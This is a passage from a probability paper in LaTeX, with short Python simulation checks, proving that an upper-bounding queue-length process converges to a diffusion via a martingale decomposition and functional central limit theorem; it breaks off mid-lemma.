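The coupling above can be illustrated with a small simulation. The sketch below is a simplification under stated assumptions: the parameters, the service-time law, and a FIFO/lowest-index service order are illustrative choices (the size-biased service order is not reproduced), and the arrival clocks are taken $\mathrm{Exp}(\lambda)$ with thresholds $c_{n,\beta}S_{c(k)}S_i^{\alpha}/n$, matching the indicator form used in the displays. The pathwise domination $N_n(k)\leq N_n^{\scriptscriptstyle U}(k)$ is then checked directly.

```python
import random

random.seed(7)

# Illustrative parameters (assumptions of this sketch, not fixed by the text).
n, alpha, lam, beta = 400, 0.5, 1.0, 0.0
c_nb = 1.0 + beta * n ** (-1.0 / 3.0)

S = [random.expovariate(1.0) + 0.05 for _ in range(n)]   # service times
T = [random.expovariate(lam) for _ in range(n)]          # arrival clocks

served, queue = set(), []
N, NU = [0], [0]          # embedded process N_n and upper bound N_n^U

for k in range(50):
    unserved = [i for i in range(n) if i not in served]
    if not unserved:
        break
    # c(k): FIFO from the queue if possible, otherwise a fresh customer
    # (a simplification of the size-biased service order).
    ck = queue.pop(0) if queue else unserved[0]
    served.add(ck)

    def joins(i):
        return T[i] <= c_nb * S[ck] * S[i] ** alpha / n

    nu = served | set(queue)   # customers who left the system or are queued
    A = sum(1 for i in range(n) if i not in nu and joins(i))
    # Upper bound: only served customers leave the pool, so a customer may
    # be counted more than once, with the same clock T_i.
    AU = sum(1 for i in range(n) if i not in served and joins(i))
    for i in range(n):
        if i not in nu and joins(i):
            queue.append(i)    # arrivals join the queue of the real process
    N.append(N[-1] + A - 1)
    NU.append(NU[-1] + AU - 1)

# Shared randomness gives A_n(k) <= A_n^U(k), hence N_n(k) <= N_n^U(k).
assert all(N[k] <= NU[k] for k in range(len(N)))
```

Since the two processes use the same clocks $(T_i)$ and the index set of $A_n(k)$ is contained in that of $A_n^{\scriptscriptstyle U}(k)$, the domination holds term by term on every sample path.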
While in general only the upper bounds \eqref{eq:pre_reflection_process_domination} and \eqref{eq:reflected_process_domination} hold, the processes $N_n(\cdot)$ and $N_n^{\scriptscriptstyle U}(\cdot)$ (resp.~$Q_n(\cdot)$ and $Q_n^{\scriptscriptstyle U}(\cdot)$) turn out to be very close to each other. We start by proving results for $N_n^{\scriptscriptstyle U}(\cdot)$ and $Q_n^{\scriptscriptstyle U}(\cdot)$ because they are easier to treat, and only then prove that identical results hold for $N_n(\cdot)$ and $Q_n(\cdot)$.
In fact, we introduce the upper bound $N_n^{\scriptscriptstyle U}(\cdot)$ to deal with the complicated index set for the summation in \eqref{eq:number_arrivals_during_one_service}. The difficulty arises as follows: in order to estimate $N_n(\cdot)$ one has to estimate $A_n(\cdot)$. To do this, one has to separately (uniformly) bound each element in the sum, and also estimate the number of elements in the sum. The first goal is accomplished, for example, through Lemma \ref{lem:1+alphaConditionalMoment}, while for the second the crude upper bound $n$ is not sharp enough. However, estimating $\vert \nu_k\vert$ requires an estimate on $N_n(\cdot)$ itself, as \eqref{eq:cardinality_nu} shows. To break this circularity, we use a bootstrap argument: we first upper bound $N_n(\cdot)$ and obtain estimates on the upper bound; from these follows an estimate on $\vert \nu_k\vert$, which in turn allows us to estimate $N_n(\cdot)$ itself.
This technique can be applied to solve a recently found technical issue in the proof of the main result of \cite{bhamidi2010scaling}. The authors in \cite{bhamidi2010scaling} prove convergence of a process which upper bounds the exploration process of the graph. Therefore, their main result is analogous to Theorem \ref{MainTheorem_U}. However, a further step is required to complete the proof of convergence of the exploration process, and this is provided by our approach.
\begin{theorem}[Convergence of the upper bound]\label{MainTheorem_U}
\begin{equation}
n^{-1/3}N_n^{\scriptscriptstyle U}( t n^{2/3})\stackrel{\mathrm{d}}{\rightarrow} W(t)\qquad\mathrm{in}~(\mathcal D, J_1)~\mathrm{as}~n\rightarrow\infty,
\end{equation}
where $W(\cdot)$ is the diffusion process in \eqref{eq:main_theorem_delta_G_1_diffusion_definition}.
In particular,
\begin{equation}%
n^{-1/3}\phi(N_n^{\scriptscriptstyle U})( t n^{2/3})\stackrel{\mathrm{d}}{\rightarrow} \phi(W)(t)\qquad\mathrm{in}~(\mathcal D, J_1)~\mathrm{as}~n\rightarrow\infty.
\end{equation}%
\end{theorem}
The next section is dedicated to the proof of Theorem \ref{MainTheorem_U}.
\subsection{Convergence of the upper bound}\label{sec:proof_thm_U}
We use a classical martingale decomposition followed by a martingale FCLT.
The process $N_n^{\scriptscriptstyle U}(\cdot)$ in \eqref{eq:pre_reflection_queue_length_process_upper_bound} can be decomposed as $N_n^{\scriptscriptstyle U}(k) = M_n^{\scriptscriptstyle U}(k) + C_n^{\scriptscriptstyle U}(k)$, where $M_n^{\scriptscriptstyle U}(\cdot)$ is a martingale and $C_n^{\scriptscriptstyle U}(\cdot)$ is a drift term, as follows:
\begin{align}%
M^{\scriptscriptstyle U}_n(k) &= \sum_{i=1}^k(A^{\scriptscriptstyle U}_n(i) - \E_{\sss S}[A^{\scriptscriptstyle U}_n(i) \mid \mathcal F_{i-1}]), \notag\\
C^{\scriptscriptstyle U}_n(k) &= \sum_{i=1}^k (\E_{\sss S}[A^{\scriptscriptstyle U}_n(i) \mid \mathcal F_{i-1}]-1).
\end{align}%
Moreover, $(M^{\scriptscriptstyle U}_n(k))^2$ can be written as $(M^{\scriptscriptstyle U}_n(k))^2 = Z^{\scriptscriptstyle U}_n(k) + B^{\scriptscriptstyle U}_n(k)$ with $Z^{\scriptscriptstyle U}_n(k)$ a martingale and $B^{\scriptscriptstyle U}_n(k)$ the compensator, or predictable quadratic variation, of $M^{\scriptscriptstyle U}_n(k)$ given by
\begin{equation}
B^{\scriptscriptstyle U}_n(k) = \sum_{i=1}^k(\E_{\sss S}[(A^{\scriptscriptstyle U}_n(i))^2 \mid \mathcal F_{i-1}] - \E_{\sss S}[A^{\scriptscriptstyle U}_n(i) \mid \mathcal F_{i-1}]^2).
\end{equation}%
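The identities behind this decomposition are exact on every sample path, which can be seen on a toy example. In the sketch below, the Bernoulli dynamics are a stand-in for $A_n^{\scriptscriptstyle U}(\cdot)$ (an illustrative assumption, not the queueing process): the split $N(k)=M(k)+C(k)$ and the nonnegativity of the increments of the compensator $B$ hold by construction.

```python
import random

random.seed(0)

# Toy Doob decomposition: X(k) = X(k-1) + A(k) - 1, with A(k) Bernoulli(p_k)
# and p_k depending on the past (so that conditioning is nontrivial).
k_max = 200
X, M, C, B = [0.0], [0.0], [0.0], [0.0]
for k in range(1, k_max + 1):
    p = 0.5 + 0.4 * (X[-1] < 0) - 0.4 * (X[-1] > 0)   # F_{k-1}-measurable
    A = 1.0 if random.random() < p else 0.0
    M.append(M[-1] + (A - p))          # martingale part: A - E[A | F_{k-1}]
    C.append(C[-1] + (p - 1.0))        # predictable drift: E[A | F_{k-1}] - 1
    B.append(B[-1] + p * (1.0 - p))    # compensator: E[A^2|F] - E[A|F]^2
    X.append(X[-1] + A - 1.0)

# X = M + C holds exactly, and B is nondecreasing (conditional variances).
assert all(abs(X[k] - (M[k] + C[k])) < 1e-9 for k in range(k_max + 1))
assert all(B[k] >= B[k - 1] for k in range(1, k_max + 1))
```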
In order to prove convergence of $N^{\scriptscriptstyle U}_n(\cdot)$ we separately prove convergence of $C^{\scriptscriptstyle U}_n(\cdot)$ and of $M^{\scriptscriptstyle U}_n(\cdot)$. We prove the former directly, and the latter by applying the martingale FCLT \cite[Theorem~7.1.4]{MarkovProcesses}. For this, we need to verify the following conditions:
\begin{enumerate}[label=(\roman*)]
\item \label{size_biased:eq:first_condition_martingale_FCLT} $\sup_{t\leq \bar t} \vert n^{-1/3}C_n^{\scriptscriptstyle U}(tn^{2/3})- \beta t + \lambda\frac{\mathbb E[S^{1+2\alpha}]}{2\mathbb E[S^{\alpha}]} t^2\vert\stackrel{\mathbb P}{\longrightarrow}0,\qquad \forall \bar t\in \mathbb R^+$;
\item \label{size_biased:eq:second_condition_martingale_FCLT}$ n^{-2/3}B_n^{\scriptscriptstyle U}(tn^{2/3})\stackrel{\mathbb P}{\longrightarrow} \sigma^2 t,\qquad \forall t\in \mathbb R^+$;
\item \label{size_biased:eq:third_condition_martingale_FCLT}$\lim_{n\rightarrow\infty}n^{-2/3} \E_{\sss S}[\sup_{t\leq\bar t} \vert B_n^{\scriptscriptstyle U}(tn^{2/3})-B_n^{\scriptscriptstyle U}(tn^{2/3}-)\vert]=0,\qquad \forall \bar t\in \mathbb R^+$;
\item \label{size_biased:eq:fourth_condition_martingale_FCLT}$\lim_{n\rightarrow\infty} n^{-2/3} \E_{\sss S}[\sup_{t\leq\bar t} \vert M_n^{\scriptscriptstyle U}(tn^{2/3})-M_n^{\scriptscriptstyle U}(tn^{2/3}-)\vert^2]=0,\qquad \forall \bar t\in \mathbb R^+$.
\end{enumerate}
\subsubsection{Proof of \ref{size_biased:eq:first_condition_martingale_FCLT} for the upper bound} \label{sec:drift_of_upper_bounding_process_converges_to_zero}
First, we obtain an explicit expression for $\E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}]$, as
\begin{align}\label{eq:conditioned_arrivals_first_eq}%
\E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}] &= \sum_{j\notin\served{i-1}}\mathbb P_{\sss S}(c(i)= j\mid\mathcal F_{i-1})\sum_{l\notin\served{i-1}\cup \{j\}}F_{\scriptscriptstyle E}\Big(\frac{c_{n,\beta}S_jS_l^{\alpha}}{n}\Big)\\
&= \sum_{j\notin\served{i-1}}\mathbb P_{\sss S} (c(i) = j \mid \mathcal F_{i-1})\sum_{l=1}^n \frac{c_{n,\beta}\lambda S_jS_l^{\alpha}}{n} \notag\\
&\quad - \sum_{j\notin\served{i-1}}\mathbb P_{\sss S}(c(i) = j \mid \mathcal F_{i-1})\sum_{l\in\served{i-1}\cup \{j\}} \frac{c_{n,\beta}\lambda S_jS_l^{\alpha}}{n}\notag\\
&\quad + \sum_{j\notin\served{i-1}}\mathbb P_{\sss S}(c(i)= j \mid \mathcal F_{i-1})\sum_{l\notin\served{i-1}\cup \{j\}} \Big( F_{\scriptscriptstyle E}\Big(\frac{c_{n,\beta}S_jS_l^{\alpha}}{n}\Big) - \frac{c_{n,\beta}\lambda S_jS_l^{\alpha}}{n}\Big).\notag
\end{align}%
The third term is an error term. Indeed, for some $\zeta_n \in [0,S_{c(i)}S_l^{\alpha}/n]$,
\begin{align}\label{eq:taylor_error_expanding_FT}%
\E_{\sss S}&\Big[\Big\vert\sum_{l\notin\served{i-1}\cup{\{j\}}}\! F_{\scriptscriptstyle E} \Big(\frac{S_{c(i)}S_l^{\alpha}}{n}\Big) - \frac{\lambda S_{c(i)}S_l^{\alpha}}{n}\Big\vert \mid \mathcal F_{i-1}\Big] \notag\\
&\leq \sum_{l\in[n]}\E_{\sss S}\Big[\Big\vert F_{\scriptscriptstyle E} \Big(\frac{S_{c(i)}S_l^{\alpha}}{n}\Big)- \frac{\lambda S_{c(i)}S_l^{\alpha}}{n}\Big\vert \mid \mathcal F_{i-1}\Big]\notag\\
&\leq \frac{1}{2n^2} \E_{\sss S}[\vert F_{\scriptscriptstyle E}''(\zeta_n)S_{c(i)}^2\vert \mid \mathcal F_{i-1}]\sum_{l\in[n]}S_l^{2\alpha}\leq \frac{\lambda^2}{2n^2}\E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}]\sum_{l\in[n]}S_l^{2\alpha},
\end{align}%
since $\vert F_{\scriptscriptstyle E}''(x)\vert \leq \lambda ^2$ for all $x\geq 0$. By Lemma \ref{lem:1+alphaConditionalMoment} this can be bounded by
\begin{align}\label{eq:F_taylor_expansion_error}%
\frac{\lambda^2}{2n^2}(C_n+ o_{\mathbb P}(1))\sum_{l\in[n]}S_l^{2\alpha},
\end{align}%
where $C_n$ is bounded w.h.p.~and the $o_{\mathbb P}(1)$ term is uniform in $i=O(n^{2/3})$. Therefore, the third term in \eqref{eq:conditioned_arrivals_first_eq} is $o_{\mathbb P}(n^{-1/3})$.
The remaining terms in \eqref{eq:conditioned_arrivals_first_eq} can be simplified as
\begin{align}\label{eq:ConditionedArrivalsFirst_U}%
\E_{\sss S}&[A^{\scriptscriptstyle U}_n(i) \mid \mathcal F_{i-1}] -1= \sum_{j\notin\served{i-1}}\mathbb P_{\sss S} (c(i) = j \mid \mathcal F_{i-1})c_{n,\beta}\lambda S_j\frac{\sum_{l\in[n]} S_l^{\alpha}}{n}\notag\\
&\quad - \sum_{j\notin\served{i-1}}\mathbb P_{\sss S}(c(i) = j \mid \mathcal F_{i-1})\sum_{l\in\served{i-1}} \frac{c_{n,\beta}\lambda S_jS_l^{\alpha}}{n} \notag\\
&\quad- c_{n,\beta}\lambda\sum_{j\notin\served{i-1}}\mathbb P_{\sss S}(c(i) = j\mid \mathcal F_{i-1})\frac{S_j^{1+\alpha}}{n} - 1 + o_{\mathbb P}(n^{-1/3})\notag\\
&=\Big(c_{n,\beta}\lambda\frac{\sum_{l\in[n]} S_l^{\alpha}}{n}\E_{\sss S}[S_{c(i)}\mid\mathcal F_{i-1}]-1\Big) - c_{n,\beta}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}]\sum_{l\in\served{i-1}}\lambda\frac{S_l^{\alpha}}{n} \notag\\
&\quad- c_{n,\beta}\frac{\lambda}{n}\E_{\sss S}[S_{c(i)}^{1+\alpha}\mid\mathcal F_{i-1}]+ o_{\mathbb P}(n^{-1/3}).
\end{align}%
For the first term of \eqref{eq:ConditionedArrivalsFirst_U}, using $\frac{c}{a-b}= \frac{c}{a}+ \frac{c}{a-b}\frac{b}{a}$, with $a = \sum_{l\in[n]}S_l^{\alpha}$ and $b = \sum_{l \in \served{i-1}}S_l^{\alpha}$,
\begin{align}\label{eq:ConditionedArrivalsFirstTerm}%
c_{n,\beta}\lambda&\frac{\sum_{l=1}^n S_l^{\alpha}}{n}\E_{\sss S}[S_{c(i)} \mid \mathcal F_{i-1}]-1 \notag\\
&=c_{n,\beta}\lambda\frac{\sum_{l\in[n]} S_l^{\alpha}}{n} \sum_{j\notin \served{i-1}} \frac{S_j^{1+\alpha}}{\sum_{l\in [n]}S_l^{\alpha}}-1 + c_{n,\beta}\lambda\frac{\sum_{l\in[n]} S_l^{\alpha}}{n}\sum_{j\notin\served{i-1}}\frac{S_j^{1+\alpha}}{\sum_{l\notin\served{i-1}}S_l^{\alpha}}\frac{\sum_{s\in\served{i-1}}S_s^{\alpha}}{\sum_{l\in[n]}S_l^{\alpha}}\notag\\
&= \Big(c_{n,\beta}\frac{\lambda}{n} \sum_{j\notin \served{i-1}} S_j^{1+\alpha} - 1 \Big)+ c_{n,\beta}\E_{\sss S}[S_{c(i)}\mid \mathcal F_{i-1}]\sum_{s\in\served{i-1}}\lambda\frac{S_s^{\alpha}}{n}.
\end{align}%
Note that the right-most term in \eqref{eq:ConditionedArrivalsFirstTerm} and the second term in \eqref{eq:ConditionedArrivalsFirst_U} cancel out. This cancellation is what makes the analysis of $N_n^{\scriptscriptstyle U}(\cdot)$ considerably easier than the analysis of $N_n(\cdot)$.
Moreover, Lemma \ref{lem:1+alphaConditionalMoment} implies that the third term in \eqref{eq:ConditionedArrivalsFirst_U} is also $o_{\mathbb P}(n^{-1/3})$.
Equation \eqref{eq:conditioned_arrivals_first_eq} then simplifies to
\begin{align}\label{eq:conditioned_arrivals_final_expression}%
\E_{\sss S}[A^{\scriptscriptstyle U}_n(i) \mid \mathcal F_{i-1}] -1 &= c_{n,\beta}\frac{\lambda}{n} \sum_{j\notin \served{i-1}} S_j^{1+\alpha} - 1
+ o_{\mathbb P}(n^{-1/3})\notag\\
&= \Big(c_{n,\beta}\frac{\lambda}{n} \sum_{j=1}^n S_j^{1+\alpha} - 1\Big) - c_{n,\beta}\frac{\lambda}{n} \sum_{j\in \served{i-1}} S_j^{1+\alpha}
+ o_{\mathbb P}(n^{-1/3})\notag\\
&= \Big(c_{n,\beta}\frac{\lambda}{n} \sum_{j=1}^n S_j^{1+\alpha} - 1\Big) - c_{n,\beta}\frac{\lambda}{n} \sum_{j=1}^{i-1} S_{c(j)}^{1+\alpha}
+ o_{\mathbb P}(n^{-1/3}),
\end{align}%
and the $o_{\mathbb P}(n^{-1/3})$ term is uniform in $i=O(n^{2/3})$. We are now able to compute
\begin{align}%
n^{-1/3}C_n^{\scriptscriptstyle U}(tn^{2/3}) &= n^{-1/3}\sum_{i=1}^{tn^{2/3}}(\E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}] -1) \notag\\
&= tn^{1/3} \Big(c_{n,\beta}\frac{\lambda}{n}\sum_{j=1}^n S_j^{1+\alpha} - 1\Big) - c_{n,\beta}\frac{\lambda}{n^{4/3}} \sum_{i=1}^{tn^{2/3}} \sum_{j=1}^{i-1} S_{c(j)}^{1+\alpha} + o_{\mathbb P}(1).
\end{align}%
Note that, since $\mathbb E[(S^{1+\alpha})^{\frac{2+\alpha}{1+\alpha}}]<\infty$, by the Marcinkiewicz--Zygmund theorem \cite[Theorem 2.5.8]{durrett2010probability}, if $\alpha\in(0,1]$,
\begin{equation}%
c_{n,\beta}\frac{\lambda}{n}\sum_{j=1}^n S_j^{1+\alpha} = c_{n,\beta}\lambda\mathbb E[S^{1+\alpha}] + o_{\mathbb P}(n^{-\frac{1}{2+\alpha}})=1 + \beta n^{-1/3} + o_{\mathbb P}(n^{-\frac{1}{2+\alpha}}).
\end{equation}%
For $\alpha = 0$, by a similar result \cite[Theorem 2.5.7]{durrett2010probability}, for all $\varepsilon>0$,
\begin{equation}%
\frac{1}{n}\sum_{j=1}^n S_j = \mathbb E[S] + o_{\mathbb P}(n^{-1/2}\log(n)^{1/2+\varepsilon}).
\end{equation}%
In particular,
\begin{equation}%
tn^{1/3} \Big(c_{n,\beta}\frac{\lambda}{n}\sum_{j=1}^n S_j^{1+\alpha} - 1\Big) = t(\beta + o_{\mathbb P}(1)).
\end{equation}%
By monotonicity,
\begin{equation}%
\sup_{t\leq T}\Big\vert tn^{1/3} \Big(c_{n,\beta}\frac{\lambda}{n}\sum_{j=1}^n S_j^{1+\alpha} - 1\Big) - \beta t \Big\vert \sr{\mathbb P}{\rightarrow} 0,
\end{equation}%
so that, for $\alpha\in[0,1]$,
\begin{equation}\label{eq:drift_rescaled_final_expression}%
n^{-1/3}C_n^{\scriptscriptstyle U}(tn^{2/3}) = \beta t - c_{n,\beta}\frac{\lambda}{n^{4/3}} \sum_{i=1}^{tn^{2/3}} \sum_{j=1}^{i-1} S_{c(j)}^{1+\alpha} + o_{\mathbb P}(1).
\end{equation}%
Since $c_{n,\beta} = 1 + O(n^{-1/3})$, the second term in \eqref{eq:drift_rescaled_final_expression} converges uniformly to $-t^2\lambda\mathbb E[S^{1+2\alpha}]/2\mathbb E[S^{\alpha}]$ by Lemma \ref{lem:size_biased_service_times_unif_convergence}.
\subsubsection{Proof of \ref{size_biased:eq:second_condition_martingale_FCLT} for the upper bound}\label{sec:quadratic_variation_of_upper_bounding_process_converges_to_zero}
Rewrite $B_n^{\scriptscriptstyle U}(k)$, for $k = O(n^{2/3})$, as
\begin{align}\label{eq:quadratic_variation_zeroth_U}%
B_n^{\scriptscriptstyle U}(k) &= \sum_{i=1}^k(\E_{\sss S}[A_n^{\scriptscriptstyle U}(i)^2 \mid \mathcal F_{i-1}] - \E_{\sss S}[A_n^{\scriptscriptstyle U}(i)\mid \mathcal F_{i-1}]^2) \notag\\
&= \sum_{i=1}^k(\E_{\sss S}[A_n^{\scriptscriptstyle U}(i)^2 \mid \mathcal F_{i-1}] - 1) + O_{\mathbb P}(kn^{-1/3}),
\end{align}%
where we have used the asymptotics for $\E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}]$ in \eqref{eq:conditioned_arrivals_final_expression}-\eqref{eq:drift_rescaled_final_expression}. Moreover, we can compute $\E_{\sss S}[A_n^{\scriptscriptstyle U}(i)^2 \mid \mathcal F_{i-1}]$ as
\begin{align}\label{eq:quadratic_variation_first_U}%
\E_{\sss S}[A_n^{\scriptscriptstyle U}(i)^2 \mid \mathcal F_{i-1}] &= \E_{\sss S}\Big[\Big(\sum_{h\notin\served{i}}\mathds{1}_{\{T_{h}\leq c_{n,\beta}S _{c(i)}S_h^{\alpha}/n\}}\Big)^2 \mid \mathcal F_{i-1}\Big] \\
&= \E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}] + \E_{\sss S}\Big[\sum_{\substack{h,q\notin \served{i}\\h\neq q}}\mathds{1}_{\{T_{h}\leq c_{n,\beta}S _{c(i)}S_h^{\alpha}/n\}}\mathds{1}_{\{T_{q}\leq c_{n,\beta} S_{c(i)}S_q^{\alpha}/n\}} \mid \mathcal F_{i-1}\Big].\notag
\end{align}%
Again by \eqref{eq:conditioned_arrivals_final_expression}, $\E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}] = 1 + o_{\mathbb P}(1)$, uniformly in $i = O(n^{2/3})$, so that \eqref{eq:quadratic_variation_zeroth_U} simplifies to
\begin{equation}%
B_n^{\scriptscriptstyle U}(k) = \sum_{i=1}^k \E_{\sss S}\Big[\sum_{\substack{h,q\notin \served{i}\\h\neq q}}\mathds{1}_{\{T_{h}\leq c_{n,\beta}S _{c(i)}S_h^{\alpha}/n\}}\mathds{1}_{\{T_{q}\leq c_{n,\beta}S_{c(i)}S_q^{\alpha}/n\}} \mid \mathcal F_{i-1}\Big] + O_{\mathbb P}(kn^{-1/3}).
\end{equation}%
We then focus on the second term in \eqref{eq:quadratic_variation_first_U}, which we compute as
\begin{align}\label{eq:BComputations_U}%
\sum_{\substack{h,q\notin \served{i}\\h\neq q}}&\E_{\sss S}[\mathds{1}_{\{T_{h}\leq c_{n,\beta}S_{c(i)}S_h^{\alpha}/n\}}\mathds{1}_{\{T_{q}\leq c_{n,\beta}S_{c(i)}S_q^{\alpha}/n\}} \mid \mathcal F_{i-1}] \\
&= \sum_{j\notin\served{i-1}}\mathbb P_{\sss S}(c(i) = j \mid \mathcal F_{i-1})\sum_{\substack{h,q\notin \served{i-1}\cup \{j\}\\h\neq q}}\E_{\sss S}[\mathds{1}_{\{T_{h}\leq c_{n,\beta}S_{j}S_h^{\alpha}/n\}}\mathds{1}_{\{T_{q}\leq c_{n,\beta}S_{j}S_q^{\alpha}/n\}} \mid \mathcal F_{i-1}].\notag
\end{align}%
By Lemma \ref{lem:n_squared_err_term},
\begin{align}%
\textrm{l.h.s.}~\eqref{eq:BComputations_U}&= \sum_{j\notin\served{i-1}} \frac{S_j^{\alpha}}{\sum_{l\notin\served{i-1}}S_l^{\alpha}} \sum_{\substack{h,q\notin \served{i-1}\cup \{j\}\\h\neq q}}\Big(\frac{c_{n,\beta}^2\lambda^2 S_j^2S_h^{\alpha}S_q^{\alpha}}{n^2} + o_{\mathbb P}(n^{-2})\Big)\notag\\
&= (c_{n,\beta}\lambda) ^2\E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}]\frac{1}{n^{2}}\sum_{\substack{h,q\notin \served{i-1}\cup \{c(i)\}\\h\neq q}}S_h^{\alpha}S_q^{\alpha} + o_{\mathbb P}(1)\notag\\
&= \frac{(c_{n,\beta}\lambda) ^2}{n^2}\E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}]\!\sum_{\substack{1\leq h,q\leq n}}\!S_h^{\alpha}S_q^{\alpha} \notag\\
&\qquad- \frac{(c_{n,\beta}\lambda) ^2}{n^2}\E_{\sss S}\Big[S_{c(i)}^2\mkern-9mu\sum_{\substack{h,q\in \served{i-1} \cup \{c(i)\}\\ \cup \{h = q\}}}\mkern-9mu S_h^{\alpha}S_q^{\alpha} \mid \mathcal F_{i-1}\Big] + o_{\mathbb P}(1).\notag
\end{align}%
The leading contribution to $B_n^{\scriptscriptstyle U}(k)$ is given by the first term, while the second term is an error term by Lemma \ref{lem:unif_convergence_random_sums}. We have shown that $B_n^{\scriptscriptstyle U}(\cdot)$ can be rewritten as
\begin{align}%
B_n^{\scriptscriptstyle U}(k) = \Big(\frac{\lambda}{n}\sum_{h\in[n]}S_h^{\alpha}\Big)^2\sum_{i=1}^k \E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}] + o_{\mathbb P}(k).
\end{align}%
Thus,
\begin{equation}%
n^{-2/3}B_n^{\scriptscriptstyle U}(n^{2/3}u) \stackrel{\mathbb P}{\rightarrow} \lambda^2\mathbb E[S^{\alpha}]\mathbb E [S^{2+\alpha}]u,
\end{equation}%
which concludes the proof of \ref{size_biased:eq:second_condition_martingale_FCLT}.
\qed
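Outside the proof, the limiting variance constant can be sanity-checked numerically: with the size-biased choice $\mathbb P_{\sss S}(c = i)\propto S_i^{\alpha}$ one has $\E_{\sss S}[S_{c}^2]=\sum_i S_i^{2+\alpha}/\sum_j S_j^{\alpha}$, so the quantity $\big(\frac{\lambda}{n}\sum_{h}S_h^{\alpha}\big)^2\,\E_{\sss S}[S_{c}^2]$ should approach $\lambda^2\mathbb E[S^{\alpha}]\mathbb E[S^{2+\alpha}]$. The (bounded, uniform) service-time law below is an illustrative assumption.

```python
import random

random.seed(11)

# Monte Carlo check of sigma^2 = lambda^2 E[S^alpha] E[S^{2+alpha}].
n, alpha, lam = 200_000, 0.5, 1.3
S = [0.5 + random.random() for _ in range(n)]   # S = 0.5 + U, U ~ Unif(0,1)

sum_alpha = sum(s ** alpha for s in S)
# Size-biased second moment: E_S[S_c^2] = sum S_i^{2+alpha} / sum S_j^alpha.
size_biased_second_moment = sum(s ** (2 + alpha) for s in S) / sum_alpha
empirical = (lam * sum_alpha / n) ** 2 * size_biased_second_moment

def moment(p):
    # Exact E[S^p] for S uniform on (0.5, 1.5).
    return (1.5 ** (p + 1) - 0.5 ** (p + 1)) / (p + 1)

target = lam ** 2 * moment(alpha) * moment(2 + alpha)
assert abs(empirical - target) / target < 0.05
```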
\subsubsection{Proof of \ref{size_biased:eq:third_condition_martingale_FCLT} for the upper bound}\label{sec:quadratic_variation_jumps_bounding_process_converges_to_zero}
The jumps of $B_n^{\scriptscriptstyle U}(k)$ are given by
\begin{align}%
B_n^{\scriptscriptstyle U}(i)-B_n^{\scriptscriptstyle U}(i-1) &= \E_{\sss S}[A_n^{\scriptscriptstyle U}(i)^2 \mid \mathcal F_{i-1}] - \E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}]^2\notag\\
&=\E_{\sss S}\Big[\sum_{\substack{h,q\notin \served{i}\\h\neq q}}\mathds{1}_{\{T_{h}\leq c_{n,\beta}S_{c(i)}S_h^{\alpha}/n\}}\mathds{1}_{\{T_{q}\leq c_{n,\beta}S _{c(i)}S_q^{\alpha}/n\}} \mid \mathcal F_{i-1}\Big]\notag\\
&\qquad+ \left(\E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F _{i-1}] - \E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F_{i-1}]^2\right).
\end{align}%
Since $\E_{\sss S}[A_n^{\scriptscriptstyle U}(i) \mid \mathcal F _{i-1}] = 1 + O_{\mathbb P}(n^{-1/3})$ for $i= O(n^{2/3})$ by \eqref{eq:conditioned_arrivals_final_expression}, the second term is of order $O_{\mathbb P}(n^{-1/3})$, uniformly in $i = O(n^{2/3})$. The first term was computed in \eqref{eq:BComputations_U}. Therefore,
\begin{align}%
&B_n^{\scriptscriptstyle U}(i) - B_n^{\scriptscriptstyle U}(i-1) \notag\\
&\quad = \frac{(c_{n,\beta}\lambda) ^2}{n^{2}}\E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}]\sum_{h,q\in[n]}S_h^{\alpha}S_q^{\alpha} - \frac{(c_{n,\beta}\lambda) ^2}{n^2}\E_{\sss S}\Big[S_{c(i)}^2\mkern-9mu\sum_{\substack{h,q\in \served{i-1}\cup \{c(i)\}\\ \cup \{h = q\}}}\mkern-9mu S_h^{\alpha}S_q^{\alpha} \mid \mathcal F_{i-1}\Big] + o_{\mathbb P}(1)\notag\\
&\quad \leq \frac{(c_{n,\beta}\lambda) ^2}{n^{2}}\E_{\sss S}[S_{c(i)}^2 \mid \mathcal F_{i-1}]\sum_{h,q\in [n]}S_h^{\alpha}S_q^{\alpha}.
\end{align}%
After rescaling and taking the expectation, we obtain the bound
\begin{equation}\label{eq:proof_of_iii_final_bound_U}%
n^{-2/3}\E_{\sss S}[\sup_{i\leq \bar t n^{2/3}}\vert B_n^{\scriptscriptstyle U}(i) - B_n^{\scriptscriptstyle U}(i-1)\vert]\leq \frac{(c_{n,\beta}\lambda)^2}{n^{2/3}}\E_{\sss S}[\sup_{i\leq \bar t n^{2/3}}S_{c(i)}^2] \Big(\frac{1}{n}\sum_{h\in[n]} S_h^{\alpha} \Big)^2.
\end{equation}%
\begin{lemma}\label{lem:exp_sup_S_squared_oP_n_two_thirds}%
If $\mathbb E[S^{2+\alpha}]<\infty$,
\begin{equation}%
\E_{\sss S}[\sup_{k\leq tn^{2/3}}S_{c(k)}^2] = o_{\mathbb P}(n^{2/3}).
\end{equation}%
\end{lemma}%
\begin{proof}
For $\varepsilon>0$ split the expectation as
\begin{align}\label{eq:first_way_beginning}%
\E_{\sss S} [(\sup_{k\leq tn^{2/3}}S_{c(k)})^2]\leq \E_{\sss S} [\sup_{k\leq tn^{2/3}}S_{c(k)}^2\mathds 1_{\{S_{c(k)}> \varepsilon n^{1/3}\}}] + \varepsilon^2 n^{2/3}.
\end{align}%
We bound the expected value in the first term as
\begin{align}%
\E_{\sss S} [\sup_{k\leq tn^{2/3}}S^2_{c(k)} \mathds 1_{\{S_{c(k)}> \varepsilon n^{1/3}\}}] &\leq \sum_{k\leq tn^{2/3}} \E_{\sss S}[S_{c(k)}^2\mathds 1_{\{S_{c(k)}> \varepsilon n^{1/3}\}}]\notag\\
